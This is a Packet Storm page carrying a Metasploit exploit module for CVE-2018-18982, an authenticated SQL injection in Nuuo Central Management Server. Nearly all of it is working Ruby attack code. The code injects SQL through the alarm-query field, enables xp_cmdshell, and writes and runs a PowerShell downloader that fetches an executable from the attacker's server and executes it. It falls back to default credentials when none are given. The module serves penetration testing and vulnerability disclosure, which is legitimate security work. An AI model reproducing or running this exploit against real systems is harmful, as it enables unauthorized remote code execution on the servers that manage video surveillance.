exploit the possibilities

Nuuo Central Management SQL Injection

Nuuo Central Management SQL Injection
Posted Feb 21, 2019
Authored by Pedro Ribeiro | Site metasploit.com

The Nuuo Central Management Server allows an authenticated user to query the state of the alarms. This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is installed by default, xp_cmdshell can be enabled and abused to achieve code execution. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided.

tags | exploit, code execution
advisories | CVE-2018-18982
MD5 | a6bd69ef31e399150c79831f73918115

Nuuo Central Management SQL Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::Nuuo
include Msf::Exploit::Remote::HttpServer

def initialize(info={})
super(update_info(info,
'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',
'Description' => %q{
The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'CVE', '2018-18982' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]

],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground
'Targets' =>
[
[ 'Nuuo Central Management Server <= v2.10.0', {} ],
],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Privileged' => false, # we run as NETWORK_SERVICE
'DisclosureDate' => 'Oct 11 2018',
'DefaultTarget' => 0))
register_options [
Opt::RPORT(5180),
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
]
end


def inject_sql(sql, final = false)
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
if final
nucs_send_msg_async(sql)
else
nucs_send_msg(sql)
end
end

# Handle incoming requests from the server
def on_request_uri(cli, request)
unless @pl
print_error("A request came in, but the payload wasn't ready yet!")
return
end
print_good('Sending the payload to CMS...')
send_response(cli, @pl)

Rex.sleep(3)

print_status('Executing shell...')
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
register_file_for_cleanup("c:/windows/temp/#{@filename}")
end

def create_hex_cmd(cmd)
var = rand_text_alpha(2)
hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
cmd.each_byte { |b|
hex_cmd << b.to_i.to_s(16)
}
hex_cmd << "; exec (@#{var})"
end

def primer
# we need to roll our own here instead of using the MSSQL mixins
# (tried that and it doesn't work)
service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
@filename = "#{rand_text_alpha_lower(8..10)}.exe"
ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
download_pl = %{xp_cmdshell }
download_pl << %{'cd C:\\windows\\temp\\ && }
download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}

print_status('Injecting PowerShell payload')
inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
register_file_for_cleanup("c:/windows/temp/#{ps1}")
end

def exploit
nucs_login

unless @nucs_session
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
end

@pl = generate_payload_exe

#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end

begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
datastore['SSL'] = true if ssl_restore
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    2 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close